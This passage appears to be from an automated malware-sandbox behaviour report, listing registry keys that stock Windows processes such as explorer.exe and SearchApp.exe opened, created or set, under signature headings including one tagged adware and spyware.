Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\explorer.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3642458265-1901903390-453309326-1000\{01F335E3-116A-44B8-9A60-FB114F4828FF} C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3642458265-1901903390-453309326-1000\{7DFF2A75-63E2-405F-8B9E-F885FB935DF0} C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A
